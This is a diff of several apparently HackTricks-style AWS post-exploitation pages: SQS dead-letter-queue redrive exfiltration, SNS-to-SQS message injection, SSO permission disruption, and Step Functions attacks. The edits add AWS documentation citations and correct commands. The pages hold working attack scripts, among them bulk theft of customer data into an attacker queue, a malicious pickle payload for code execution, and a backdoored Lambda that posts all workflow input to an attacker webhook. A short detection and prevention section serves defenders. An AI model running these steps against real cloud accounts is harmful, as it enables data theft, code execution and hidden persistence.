+Source and destination queues must be the same type (standard or FIFO), and a custom redrive rate cannot exceed 500 messages per second.<sup>[[2]](#references)</sup>
 
 ## Impact
-**Potential Impact**: Exfiltrate sensitive payloads accumulated in DLQs (failed events, PII, tokens, application payloads) at high speed using native SQS APIs. Works cross-account if the destination queue policy allows `SendMessage` from the victim principal.
+**Potential Impact**: Exfiltrate sensitive payloads accumulated in DLQs (failed events, PII, tokens, application payloads) at a high rate using native SQS APIs; the service supports a custom movement rate of up to 500 messages per second.<sup>[[1]](#references)</sup>
 
 ## How to Abuse
 
-- Identify the victim DLQ ARN and ensure it is actually referenced as a DLQ by some queue (any queue is fine).
-- Create or choose an attacker-controlled destination queue and get its ARN.
-- Start a message move task from the victim DLQ to your destination queue.
-- Monitor progress or cancel if needed.
+- Identify the victim DLQ ARN and ensure it is configured as a DLQ for an SQS source queue.<sup>[[1]](#references)</sup>
+- Create or choose an attacker-controlled destination queue of the same type as the DLQ.<sup>[[2]](#references)</sup>
+- Start a message move task from the victim DLQ to your destination queue.<sup>[[1]](#references)</sup>
+- Monitor progress or cancel if needed.<sup>[[2]](#references)</sup>
 
 ### CLI Example: Exfiltrating Customer Data from E-commerce DLQ
 
 **Scenario**: An attacker has compromised AWS credentials and discovered that an e-commerce application uses SQS with a DLQ containing failed customer order processing attempts.
 
+The example assumes that the victim DLQ and destination are standard queues; use a destination with matching FIFO configuration when the victim DLQ is FIFO.<sup>[[2]](#references)</sup>
+
 1) **Discover and examine the victim DLQ**
 
 ```bash
 # List queues to find DLQs (look for names containing 'dlq', 'dead', 'failed', etc.)
-aws sqs list-queues --queue-name-prefix dlq
+aws sqs list-queues
 
 # Let's say we found: https://sqs.us-east-1.amazonaws.com/123456789012/ecommerce-orders-dlq
 VICTIM_DLQ_URL="https://sqs.us-east-1.amazonaws.com/123456789012/ecommerce-orders-dlq"
@@ -62,7 +65,7 @@ SRC_ARN=$(aws sqs get-queue-attributes --queue-url "$VICTIM_DLQ_URL" --attribute
 # Check how many messages are in the DLQ (potential treasure trove!)
 aws sqs get-queue-attributes --queue-url "$VICTIM_DLQ_URL" \
   --attribute-names ApproximateNumberOfMessages
-# Output might show: "ApproximateNumberOfMessages": "1847" 
+# Output might show: "ApproximateNumberOfMessages": "1847"
 ```
 
 2) **Create attacker-controlled destination queue**
@@ -97,9 +100,16 @@ aws sqs list-message-move-tasks --source-arn "$SRC_ARN" --max-results 10
 ```bash
 # Receive the exfiltrated customer data
 echo "Receiving stolen customer data..."
-aws sqs receive-message --queue-url "$ATTACKER_Q_URL" \
+PREVIEW_MESSAGES=$(aws sqs receive-message --queue-url "$ATTACKER_Q_URL" \
   --attribute-names All --message-attribute-names All \
-  --max-number-of-messages 10 --wait-time-seconds 5
+  --max-number-of-messages 10 --wait-time-seconds 5 --output json)
+echo "$PREVIEW_MESSAGES"
+echo "$PREVIEW_MESSAGES" >> stolen_customer_data.json
+echo "$PREVIEW_MESSAGES" | jq -r '.Messages[]?.ReceiptHandle' |
+  while IFS= read -r RECEIPT_HANDLE; do
+    aws sqs delete-message --queue-url "$ATTACKER_Q_URL" \
+      --receipt-handle "$RECEIPT_HANDLE"
+  done
 
 # Example of what an attacker might see:
 # {
@@ -111,33 +121,38 @@ aws sqs receive-message --queue-url "$ATTACKER_Q_URL" \
 while true; do
   MESSAGES=$(aws sqs receive-message --queue-url "$ATTACKER_Q_URL" \
     --max-number-of-messages 10 --wait-time-seconds 2 --output json)
-  
-  if [ "$(echo "$MESSAGES" | jq '.Messages | length')" -eq 0 ]; then
+
+  if [ "$(echo "$MESSAGES" | jq '.Messages // [] | length')" -eq 0 ]; then
     echo "No more messages - exfiltration complete!"
     break
   fi
-  
+
   echo "Received batch of stolen data..."
   # Process/save the stolen customer data
   echo "$MESSAGES" >> stolen_customer_data.json
+  echo "$MESSAGES" | jq -r '.Messages[]?.ReceiptHandle' |
+    while IFS= read -r RECEIPT_HANDLE; do
+      aws sqs delete-message --queue-url "$ATTACKER_Q_URL" \
+        --receipt-handle "$RECEIPT_HANDLE"
+    done
 done
 ```
 
 ### Cross-account notes
-- The destination queue must have a resource policy allowing the victim principal to `sqs:SendMessage` (and, if used, KMS grants/permissions).
+- `StartMessageMoveTask` does not support cross-account permissions. Do not rely on a destination queue resource policy alone to make cross-account redrive work; keep the redrive within the account that owns the DLQ and its SQS source.<sup>[[3]](#references)[[4]](#references)</sup>
 
 ## Why This Attack is Effective
 
 1. **Legitimate AWS Feature**: Uses built-in AWS functionality, making it hard to detect as malicious
-2. **Bulk Operation**: Transfers thousands of messages quickly instead of slow individual access
+2. **Bulk Operation**: Transfers thousands of messages quickly instead of slow individual access, subject to the configured movement rate and SQS limits.<sup>[[1]](#references)</sup>
 3. **Historical Data**: DLQs accumulate sensitive data over weeks/months
 4. **Under the Radar**: Many organizations don't monitor DLQ access closely
-5. **Cross-Account Capable**: Can exfiltrate to attacker's own AWS account if permissions allow
+5. **Permission Boundary**: Cross-account permissions do not apply to `StartMessageMoveTask`, so a destination queue policy alone cannot enable a cross-account redrive.<sup>[[4]](#references)</sup>
 
 ## Detection and Prevention
 
 ### Detection
-Monitor CloudTrail for suspicious `StartMessageMoveTask` API calls:
+CloudTrail uses `StartMessageMoveTask` as the event name for this redrive operation; monitor for suspicious calls and unexpected source or destination ARNs.<sup>[[5]](#references)</sup>
 ```json
 {
   "eventName": "StartMessageMoveTask",
@@ -148,7 +163,7 @@ Monitor CloudTrail for suspicious `StartMessageMoveTask` API calls:
   },
   "requestParameters": {
     "sourceArn": "arn:aws:sqs:us-east-1:123456789012:sensitive-dlq",
-    "destinationArn": "arn:aws:sqs:us-east-1:attacker-account:exfil-queue"
+    "destinationArn": "arn:aws:sqs:us-east-1:123456789012:exfil-queue"
   }
 }
 ```
@@ -156,8 +171,17 @@ Monitor CloudTrail for suspicious `StartMessageMoveTask` API calls:
 ### Prevention
 1. **Least Privilege**: Restrict `sqs:StartMessageMoveTask` permissions to only necessary roles
 2. **Monitor DLQs**: Set up CloudWatch alarms for unusual DLQ activity
-3. **Cross-Account Policies**: Carefully review SQS queue policies allowing cross-account access
+3. **Queue Policies**: Carefully review SQS queue policies and DLQ redrive allow policies
 4. **Encrypt DLQs**: Use SSE-KMS with restricted key policies
 5. **Regular Cleanup**: Don't let sensitive data accumulate in DLQs indefinitely
+
+## References
+
+- [1] [StartMessageMoveTask - Amazon Simple Queue Service API Reference](https://docs.aws.amazon.com/AWSSimpleQueueService/latest/APIReference/API_StartMessageMoveTask.html)
+- [2] [Learn how to configure a dead-letter queue redrive - Amazon Simple Queue Service](https://docs.aws.amazon.com/AWSSimpleQueueService/latest/SQSDeveloperGuide/sqs-configure-dead-letter-queue-redrive.html)
+- [3] [Using dead-letter queues in Amazon SQS](https://docs.aws.amazon.com/AWSSimpleQueueService/latest/SQSDeveloperGuide/sqs-dead-letter-queues.html)
+- [4] [Limitations of Amazon SQS custom policies](https://docs.aws.amazon.com/AWSSimpleQueueService/latest/SQSDeveloperGuide/sqs-limitations-of-custom-policies.html)
+- [5] [CloudTrail update and permission requirements for Amazon SQS dead-letter queue redrive](https://docs.aws.amazon.com/AWSSimpleQueueService/latest/SQSDeveloperGuide/sqs-dead-letter-queues-cloudtrail.html)
+- [6] [Amazon SQS API permissions: Actions and resource reference](https://docs.aws.amazon.com/AWSSimpleQueueService/latest/SQSDeveloperGuide/sqs-api-permissions-reference.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation/aws-sqs-sns-injection.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation/aws-sqs-sns-injection.md
@@ -1,17 +1,17 @@
 # AWS – SQS Cross-/Same-Account Injection via SNS Subscription + Queue Policy
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## Description
 
-Abuse an SQS queue resource policy to allow an attacker-controlled SNS topic to publish messages into a victim SQS queue. In the same account, an SQS subscription to an SNS topic auto-confirms; in cross-account, you must read the SubscriptionConfirmation token from the queue and call ConfirmSubscription. This enables unsolid message injection that downstream consumers may implicitly trust.
+An SQS queue resource policy can allow an attacker-controlled SNS topic to publish messages into a victim SQS queue, provided the policy grants `sqs:SendMessage` to SNS and constrains the topic with `aws:SourceArn`.<sup>[[1]](#references)</sup> When the queue owner creates the subscription, SNS confirms it automatically; when a principal that does not own the queue creates it, SNS sends a subscription-confirmation message to the queue, and the subscription owner must confirm with its token before notifications flow.<sup>[[1]](#references)[[2]](#references)[[3]](#references)[[4]](#references)</sup> This enables unsolicited message injection that downstream consumers may implicitly trust.
 
 ### Requirements
-- Ability to modify the target SQS queue resource policy: `sqs:SetQueueAttributes` on the victim queue.
-- Ability to create/publish to an SNS topic under attacker control: `sns:CreateTopic`, `sns:Publish`, and `sns:Subscribe` on the attacker account/topic.
-- Cross-account only: temporary `sqs:ReceiveMessage` on the victim queue to read the confirmation token and call `sns:ConfirmSubscription`.
+- Ability to modify the target SQS queue resource policy: `sqs:SetQueueAttributes` on the victim queue.<sup>[[1]](#references)[[6]](#references)</sup>
+- Ability to create/publish to an SNS topic under attacker control: `sns:CreateTopic`, `sns:Publish`, and `sns:Subscribe` on the attacker account/topic.<sup>[[2]](#references)[[5]](#references)</sup>
+- Cross-account, when a principal other than the queue owner creates the subscription: temporary `sqs:ReceiveMessage` on the victim queue to read the confirmation token and `sns:ConfirmSubscription` on the topic.<sup>[[2]](#references)[[4]](#references)[[5]](#references)[[6]](#references)</sup>
 
 ### Same-account exploitation
+
+The following example follows AWS's documented policy, subscription, publish, and queue-read sequence.<sup>[[1]](#references)[[5]](#references)</sup>
 
 ```bash
 REGION=us-east-1
@@ -42,15 +42,24 @@ aws sqs set-queue-attributes --queue-url "$Q_URL" --region $REGION --attributes 
 aws sns subscribe --topic-arn "$TOPIC_ARN" --protocol sqs --notification-endpoint "$Q_ARN" --region $REGION
 
 # 5) Publish and verify injection
-aws sns publish --topic-arn "$TOPIC_ARN" --message {pwn:sns->sqs} --region $REGION
+aws sns publish --topic-arn "$TOPIC_ARN" --message 'pwn:sns->sqs' --region $REGION
 aws sqs receive-message --queue-url "$Q_URL" --region $REGION --max-number-of-messages 1 --wait-time-seconds 10 --attribute-names All --message-attribute-names All
 ```
 
 ### Cross-account notes
-- The queue policy above must allow the foreign `TOPIC_ARN` (attacker account).
-- Subscriptions won’t auto-confirm. Grant yourself temporary `sqs:ReceiveMessage` on the victim queue to read the `SubscriptionConfirmation` message and then call `sns confirm-subscription` with its `Token`.
+- The queue policy above must allow the foreign `TOPIC_ARN` (attacker account), while retaining a source-ARN condition to restrict deliveries to that topic.<sup>[[1]](#references)[[2]](#references)</sup>
+- If a principal other than the queue owner creates the subscription, SNS places a subscription-confirmation message in the queue. A principal with `sqs:ReceiveMessage` can retrieve its token, and the subscription owner can call `sns confirm-subscription`; no notifications flow until confirmation.<sup>[[2]](#references)[[4]](#references)[[6]](#references)</sup>
 
 ### Impact
-**Potential Impact**: Continuous unsolid message injection into a trusted SQS queue via SNS, potentially triggering unintended processing, data pollution, or workflow abuse.
+**Potential Impact**: Continuous unsolicited message injection into a trusted SQS queue via SNS, potentially triggering unintended processing, data pollution, or workflow abuse.
+
+## References
+
+- [1] [Subscribing an Amazon SQS queue to an Amazon SNS topic](https://docs.aws.amazon.com/sns/latest/dg/subscribe-sqs-queue-to-sns-topic.html)
+- [2] [Sending Amazon SNS messages to an Amazon SQS queue in a different account](https://docs.aws.amazon.com/sns/latest/dg/sns-send-message-to-sqs-cross-account.html)
+- [3] [Subscribe - Amazon Simple Notification Service API Reference](https://docs.aws.amazon.com/sns/latest/api/API_Subscribe.html)
+- [4] [ConfirmSubscription - Amazon Simple Notification Service API Reference](https://docs.aws.amazon.com/sns/latest/api/API_ConfirmSubscription.html)
+- [5] [Actions, resources, and condition keys for Amazon SNS](https://docs.aws.amazon.com/service-authorization/latest/reference/list_sns.html)
+- [6] [Actions, resources, and condition keys for Amazon SQS](https://docs.aws.amazon.com/service-authorization/latest/reference/list_sqs.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation/README.md
@@ -1,7 +1,5 @@
 # AWS - SSO & identitystore Post Exploitation
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## SSO & identitystore
 
 For more information check:
@@ -12,18 +10,22 @@ For more information check:
 
 ### `sso:DeletePermissionSet` | `sso:PutPermissionsBoundaryToPermissionSet` | `sso:DeleteAccountAssignment`
 
-These permissions can be used to disrupt permissions:
+These permissions can be used to disrupt access by deleting a permission set, attaching a permissions boundary, or deleting an account assignment.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup>
 
 ```bash
 aws sso-admin delete-permission-set --instance-arn <SSOInstanceARN> --permission-set-arn <PermissionSetARN>
 
-aws sso-admin put-permissions-boundary-to-permission-set --instance-arn <SSOInstanceARN> --permission-set-arn <PermissionSetARN> --permissions-boundary-policy-arn <PolicyARN>
+aws sso-admin put-permissions-boundary-to-permission-set --instance-arn <SSOInstanceARN> --permission-set-arn <PermissionSetARN> --permissions-boundary ManagedPolicyArn=<PolicyARN>
 
 aws sso-admin delete-account-assignment --instance-arn <SSOInstanceARN> --target-id <TargetID> --target-type <TargetType> --permission-set-arn <PermissionSetARN> --principal-type <PrincipalType> --principal-id <PrincipalID>
 ```
 
+## References
+
+- [1] [delete-permission-set — AWS CLI 2 Command Reference](https://docs.aws.amazon.com/cli/latest/reference/sso-admin/delete-permission-set.html)
+- [2] [put-permissions-boundary-to-permission-set — AWS CLI 2 Command Reference](https://docs.aws.amazon.com/cli/latest/reference/sso-admin/put-permissions-boundary-to-permission-set.html)
+- [3] [delete-account-assignment — AWS CLI 2 Command Reference](https://docs.aws.amazon.com/cli/latest/reference/sso-admin/delete-account-assignment.html)
+
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
 
 

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation/README.md
@@ -1,7 +1,5 @@
 # AWS - Step Functions Post Exploitation
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## Step Functions
 
 For more information about this AWS service, check:
@@ -12,19 +10,19 @@ For more information about this AWS service, check:
 
 ### `states:RevealSecrets`
 
-This permission allows to **reveal secret data inside an execution**. For it, it's needed to set Inspection level to TRACE and the revealSecrets parameter to true.
+This is a permission-only action used by the `TestState` API. Setting `revealSecrets` to `true` requires `states:RevealSecrets`; for an HTTP Task, combining it with `inspectionLevel` set to `TRACE` includes secrets that an EventBridge connection adds to request headers, query parameters, or the request body in the test result. It does not generally expose arbitrary secrets from a normal state-machine execution.<sup>[[1]](#references)[[15]](#references)</sup>
 
 <figure><img src="../../../images/image (348).png" alt=""><figcaption></figcaption></figure>
 
 ### `states:DeleteStateMachine`, `states:DeleteStateMachineVersion`, `states:DeleteStateMachineAlias`
 
-An attacker with these permissions would be able to permanently delete state machines, their versions, and aliases. This can disrupt critical workflows, result in data loss, and require significant time to recover and restore the affected state machines. In addition, it would allow an attacker to cover the tracks used, disrupt forensic investigations, and potentially cripple operations by removing essential automation processes and state configurations.
+An attacker with these permissions could delete state machines, their versions, and aliases, disrupting critical workflows and removing automation configuration used by operations or investigations.<sup>[[2]](#references)[[3]](#references)[[4]](#references)</sup>
 
 > [!NOTE]
 >
-> - Deleting a state machine you also delete all its associated versions and aliases.
-> - Deleting a state machine alias you do not delete the state machine versions referecing this alias.
-> - It is not possible to delete a state machine version currently referenced by one o more aliases.
+> - Deleting a state machine also deletes all its associated versions and aliases.<sup>[[2]](#references)</sup>
+> - Deleting a state machine alias does not delete the state machine versions referencing that alias.<sup>[[4]](#references)</sup>
+> - It is not possible to delete a state machine version currently referenced by one or more aliases.<sup>[[3]](#references)</sup>
 
 ```bash
 # Delete state machine
@@ -35,51 +33,51 @@ aws stepfunctions delete-state-machine-version --state-machine-version-arn <valu
 aws stepfunctions delete-state-machine-alias --state-machine-alias-arn <value>
 ```
 
-- **Potential Impact**: Disruption of critical workflows, data loss, and operational downtime.
+- **Potential Impact**: Disruption of critical workflows, data loss, and operational downtime.<sup>[[2]](#references)[[3]](#references)[[4]](#references)</sup>
 
 ### `states:UpdateMapRun`
 
-An attacker with this permission would be able to manipulate the Map Run failure configuration and parallel setting, being able to increase or decrease the maximum number of child workflow executions allowed, affecting directly and performance of the service. In addition, an attacker could tamper with the tolerated failure percentage and count, being able to decrease this value to 0 so every time an item fails, the whole map run would fail, affecting directly to the state machine execution and potentially disrupting critical workflows.
+An attacker with this permission could modify an in-progress Map Run's maximum child-execution concurrency and failure thresholds. Setting the tolerated failure percentage or count to `0` means the Map Run fails when any item fails, which can disrupt the parent workflow.<sup>[[5]](#references)</sup>
 
 ```bash
 aws stepfunctions update-map-run --map-run-arn <value> [--max-concurrency <value>] [--tolerated-failure-percentage <value>] [--tolerated-failure-count <value>]
 ```
 
-- **Potential Impact**: Performance degradation, and disruption of critical workflows.
+- **Potential Impact**: Performance degradation and disruption of critical workflows.<sup>[[5]](#references)</sup>
 
 ### `states:StopExecution`
 
-An attacker with this permission could be able to stop the execution of any state machine, disrupting ongoing workflows and processes. This could lead to incomplete transactions, halted business operations, and potential data corruption.
+An attacker with this permission could stop a running execution, disrupting ongoing workflows and processes. This could lead to incomplete transactions, halted business operations, and potential data corruption.<sup>[[6]](#references)</sup>
 
 > [!WARNING]
-> This action is not supported by **express state machines**.
+> This action is not supported by **Express state machines**.<sup>[[6]](#references)</sup>
 
 ```bash
 aws stepfunctions stop-execution --execution-arn <value> [--error <value>] [--cause <value>]
 ```
 
-- **Potential Impact**: Disruption of ongoing workflows, operational downtime, and potential data corruption.
+- **Potential Impact**: Disruption of ongoing workflows, operational downtime, and potential data corruption.<sup>[[6]](#references)</sup>
 
 ### `states:TagResource`, `states:UntagResource`
 
-An attacker could add, modify, or remove tags from Step Functions resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags.
+An attacker could add, modify, or remove tags from Step Functions resources, disrupting cost allocation and resource tracking, or changing the result of tag-based authorization policies.<sup>[[7]](#references)[[8]](#references)[[9]](#references)</sup>
 
 ```bash
 aws stepfunctions tag-resource --resource-arn <value> --tags Key=<key>,Value=<value>
 aws stepfunctions untag-resource --resource-arn <value> --tag-keys <key>
 ```
 
-**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies.
+**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies.<sup>[[7]](#references)[[8]](#references)[[9]](#references)</sup>
 
 ---
 
 ### `states:StartExecution` -> Input Injection Into Dangerous Sinks
 
-`states:StartExecution` is a data-plane entrypoint. If a state machine forwards attacker-controlled input into a task that contains a dangerous sink (for example a Lambda that does `pickle.loads(base64.b64decode(payload_b64))`), you can sometimes turn **StartExecution** into **code execution** and **secret exfiltration** through the execution output, without any permission to update the state machine.
+`states:StartExecution` starts a state-machine execution and accepts JSON input. A `Task` state can pass that input to a Lambda or another service integration, so a workflow that sends unvalidated input to a dangerous sink (for example a Lambda that does `pickle.loads(base64.b64decode(payload_b64))`) can turn **StartExecution** into code execution and data exposure without requiring permission to update the state machine.<sup>[[10]](#references)[[16]](#references)[[13]](#references)</sup>
 
 #### Discover the workflow and the invoked Lambda
 
-If you have `states:List*` / `states:Describe*`, you can enumerate and read the state machine definition:
+If you have `states:ListStateMachines`, you can enumerate state machines; `states:DescribeStateMachine` returns a state machine's Amazon States Language definition and configuration:<sup>[[11]](#references)[[15]](#references)</sup>
 
 ```bash
 REGION=us-east-1
@@ -88,7 +86,7 @@ SM_ARN="<state_machine_arn>"
 aws stepfunctions describe-state-machine --region "$REGION" --state-machine-arn "$SM_ARN" --query definition --output text
 ```
 
-If you also have `lambda:GetFunction`, you can download the Lambda code bundle to understand how input is processed (and confirm whether unsafe deserialization exists):
+If you also have `lambda:GetFunction`, its response includes a deployment-package download URL that is valid for 10 minutes, allowing you to inspect how input is processed and check for unsafe deserialization:<sup>[[12]](#references)</sup>
 
 ```bash
 LAMBDA_ARN="<lambda_arn_from_definition>"
@@ -100,7 +98,7 @@ ls -la /tmp/lambda_code
 
 #### Example: crafted pickle in execution input (Python)
 
-If the Lambda unpickles attacker-controlled data, a malicious pickle can execute code during deserialization. Example payload that evaluates a Python expression in the Lambda runtime:
+If the Lambda unpickles attacker-controlled data, a malicious pickle can execute arbitrary code during deserialization. The following example evaluates a Python expression in the Lambda runtime; use a harmless proof of execution in an authorized test environment.<sup>[[13]](#references)</sup>
 
 ```bash
 PAYLOAD_B64="$(python3 - <<'PY'
@@ -119,11 +117,11 @@ EXEC_ARN="$(aws stepfunctions start-execution --region "$REGION" --state-machine
 aws stepfunctions describe-execution --region "$REGION" --execution-arn "$EXEC_ARN" --query output --output text
 ```
 
-**Impact**: Whatever permissions the task role has (Secrets Manager reads, S3 writes, KMS decrypt, etc.) can become reachable via crafted input, and the result may be returned in the Step Functions execution output.
+The `describe-execution` retrieval below applies to Standard workflows; Express executions are not supported by `DescribeExecution` unless they were dispatched by a Map Run. When the task runs successfully, its execution role's permissions can become reachable through crafted input, and the output can carry data returned by the workflow.<sup>[[14]](#references)[[16]](#references)</sup>
 
 ### `states:UpdateStateMachine`, `lambda:UpdateFunctionCode`
 
-An attacker who compromises a user or role with the following permissions:
+An attacker who compromises a user or role with both `states:UpdateStateMachine` and `lambda:UpdateFunctionCode` can change a state machine definition and upload Lambda code. These are separate write actions in AWS IAM:<sup>[[15]](#references)[[19]](#references)[[20]](#references)</sup>
 
 ```json
 {
@@ -145,9 +143,9 @@ An attacker who compromises a user or role with the following permissions:
 }
 ```
 
-...can conduct a **high-impact and stealthy post-exploitation attack** by combining Lambda backdooring with Step Function logic manipulation.
+This combination can enable a **high-impact post-exploitation attack** by combining Lambda backdooring with Step Functions logic manipulation.<sup>[[19]](#references)[[20]](#references)</sup>
 
-This scenario assumes that the victim uses **AWS Step Functions to orchestrate workflows that process sensitive input**, such as credentials, tokens, or PII.
+This scenario assumes that the victim uses **AWS Step Functions to orchestrate workflows that process sensitive input**, such as credentials, tokens, or PII.<sup>[[10]](#references)[[16]](#references)</sup>
 
 Example victim invocation:
 
@@ -157,20 +155,28 @@ aws stepfunctions start-execution \
   --input '{"email": "victim@example.com", "password": "hunter2"}' --profile victim
 ```
 
-If the Step Function is configured to invoke a Lambda like `LegitBusinessLogic`, the attacker can proceed with **two stealthy attack variants**:
+If the Step Function is configured to invoke a Lambda such as `LegitBusinessLogic`, the attacker can proceed with **two attack variants**.<sup>[[16]](#references)</sup>
 
 ---
 
-####  Updated the lambda function
+#### Update the Lambda function
 
-The attacker modifies the code of the Lambda function already used by the Step Function (`LegitBusinessLogic`) to silently exfiltrate input data.
+The attacker modifies the code of the Lambda function already used by the Step Function (`LegitBusinessLogic`) to silently exfiltrate input data. `UpdateFunctionCode` accepts a ZIP deployment package for ZIP-based functions.<sup>[[20]](#references)</sup>
 
 ```python
 # send_to_attacker.py
-import requests
+import json
+from urllib.request import Request, urlopen
 
 def lambda_handler(event, context):
-    requests.post("https://webhook.site/<attacker-id>/exfil", json=event)
+    body = json.dumps(event).encode()
+    request = Request(
+        "https://webhook.site/<attacker-id>/exfil",
+        data=body,
+        headers={"Content-Type": "application/json"},
+    )
+    with urlopen(request, timeout=5):
+        pass
     return {"status": "exfiltrated"}
 ```
 
@@ -179,74 +185,82 @@ zip function.zip send_to_attacker.py
 
 aws lambda update-function-code \
   --function-name LegitBusinessLogic \
-  --zip-file fileb://function.zip -profile attacker
+  --zip-file fileb://function.zip --profile attacker
 ```
 
 ---
 
 #### Add a Malicious State to the Step Function
 
-Alternatively, the attacker can inject an **exfiltration state** at the beginning of the workflow by updating the Step Function definition.
+Alternatively, the attacker can prepend an **exfiltration state** to the workflow by updating its Amazon States Language definition. `InputPath: "$"` passes the full state input to the task, while `ResultPath: "$.exfil"` stores the task result in the state data before the workflow continues.<sup>[[18]](#references)[[19]](#references)</sup>
 
-```malicious_state_definition.json
-{
-  "Comment": "Backdoored for Exfiltration",
-  "StartAt": "OriginalState",
-  "States": {
-    "OriginalState": {
-      "Type": "Task",
-      "Resource": "arn:aws:lambda:us-east-1:<victim-id>:function:LegitBusinessLogic",
-      "End": true
-    }
-  }
-}
-
-```
-
-```bash
-aws stepfunctions update-state-machine \
-  --state-machine-arn arn:aws:states:us-east-1:<victim-id>:stateMachine:LegitStateMachine \
-  --definition file://malicious_state_definition.json --profile attacker
-```
-
-The attacker can even more stealthy to update the state definition to something like this 
+```json
 {
   "Comment": "Backdoored for Exfiltration",
   "StartAt": "ExfiltrateSecrets",
   "States": {
     "ExfiltrateSecrets": {
       "Type": "Task",
-      "Resource": "arn:aws:lambda:us-east-1:victim-id:function:SendToAttacker",
+      "Resource": "arn:aws:lambda:us-east-1:<victim-account-id>:function:SendToAttacker",
       "InputPath": "$",
       "ResultPath": "$.exfil",
       "Next": "OriginalState"
     },
     "OriginalState": {
       "Type": "Task",
-      "Resource": "arn:aws:lambda:us-east-1:victim-id:function:LegitBusinessLogic",
+      "Resource": "arn:aws:lambda:us-east-1:<victim-account-id>:function:LegitBusinessLogic",
       "End": true
     }
-  }  
+  }
 }
- where the victim won't realize the different 
+```
+
+```bash
+aws stepfunctions update-state-machine \
+  --state-machine-arn arn:aws:states:us-east-1:<victim-account-id>:stateMachine:LegitStateMachine \
+  --definition file://malicious_state_definition.json --profile attacker
+```
+
+The compact definition above stands in for the victim's complete legitimate state graph; a real modification must preserve and reconnect those states. The execution role must be able to invoke both Lambda functions, or the new task will fail.<sup>[[16]](#references)[[19]](#references)</sup>
+
+Because the added task stores its result and then transitions to the legitimate task, external callers may still receive normal business output through the workflow's existing transition path.<sup>[[17]](#references)[[18]](#references)</sup>
 
 ---
 
 ### Victim Setup (Context for Exploit)
 
-- A Step Function (`LegitStateMachine`) is used to process sensitive user input.
-- It calls one or more Lambda functions such as `LegitBusinessLogic`.
+- A Step Function (`LegitStateMachine`) is used to process sensitive user input.<sup>[[10]](#references)[[16]](#references)</sup>
+- It calls one or more Lambda functions such as `LegitBusinessLogic`.<sup>[[16]](#references)</sup>
 
 ---
 
-**Potential Impact**:  
-- Silent exfiltration of sensitive data including secrets, credentials, API keys, and PII.
-- No visible errors or failures in workflow execution.
+**Potential Impact**:
+- Silent exfiltration of sensitive data including secrets, credentials, API keys, and PII.<sup>[[16]](#references)[[20]](#references)</sup>
+- No visible errors or failures in workflow execution when the added task succeeds and the original workflow continues.<sup>[[17]](#references)[[18]](#references)</sup>
 - Difficult to detect without auditing Lambda code or execution traces.
-- Enables long-term persistence if backdoor remains in code or ASL logic.
+- Enables long-term persistence if the backdoor remains in Lambda code or ASL logic.<sup>[[19]](#references)[[20]](#references)</sup>
 
+## References
+
+- [1] [TestState - AWS Step Functions](https://docs.aws.amazon.com/step-functions/latest/apireference/API_TestState.html)
+- [2] [DeleteStateMachine - AWS Step Functions](https://docs.aws.amazon.com/step-functions/latest/apireference/API_DeleteStateMachine.html)
+- [3] [DeleteStateMachineVersion - AWS Step Functions](https://docs.aws.amazon.com/step-functions/latest/apireference/API_DeleteStateMachineVersion.html)
+- [4] [DeleteStateMachineAlias - AWS Step Functions](https://docs.aws.amazon.com/step-functions/latest/apireference/API_DeleteStateMachineAlias.html)
+- [5] [UpdateMapRun - AWS Step Functions](https://docs.aws.amazon.com/step-functions/latest/apireference/API_UpdateMapRun.html)
+- [6] [StopExecution - AWS Step Functions](https://docs.aws.amazon.com/step-functions/latest/apireference/API_StopExecution.html)
+- [7] [TagResource - AWS Step Functions](https://docs.aws.amazon.com/step-functions/latest/apireference/API_TagResource.html)
+- [8] [UntagResource - AWS Step Functions](https://docs.aws.amazon.com/step-functions/latest/apireference/API_UntagResource.html)
+- [9] [Creating tag-based IAM policies in Step Functions - AWS Step Functions](https://docs.aws.amazon.com/step-functions/latest/dg/tag-based-policies.html)
+- [10] [StartExecution - AWS Step Functions](https://docs.aws.amazon.com/step-functions/latest/apireference/API_StartExecution.html)
+- [11] [DescribeStateMachine - AWS Step Functions](https://docs.aws.amazon.com/step-functions/latest/apireference/API_DescribeStateMachine.html)
+- [12] [GetFunction - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/api/API_GetFunction.html)
+- [13] [pickle — Python object serialization](https://docs.python.org/3/library/pickle.html)
+- [14] [DescribeExecution - AWS Step Functions](https://docs.aws.amazon.com/step-functions/latest/apireference/API_DescribeExecution.html)
+- [15] [Actions, resources, and condition keys for AWS Step Functions](https://docs.aws.amazon.com/service-authorization/latest/reference/list_stepfunctions.html)
+- [16] [Task workflow state - AWS Step Functions](https://docs.aws.amazon.com/step-functions/latest/dg/state-task.html)
+- [17] [State machine structure in Amazon States Language for Step Functions workflows](https://docs.aws.amazon.com/step-functions/latest/dg/statemachine-structure.html)
+- [18] [Processing input and output in Step Functions](https://docs.aws.amazon.com/step-functions/latest/dg/concepts-input-output-filtering.html)
+- [19] [UpdateStateMachine - AWS Step Functions](https://docs.aws.amazon.com/step-functions/latest/apireference/API_UpdateStateMachine.html)
+- [20] [UpdateFunctionCode - AWS Lambda](https://docs.aws.amazon.com/lambda/latest/api/API_UpdateFunctionCode.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation/README.md
@@ -1,7 +1,5 @@
 # AWS - STS Post Exploitation
 
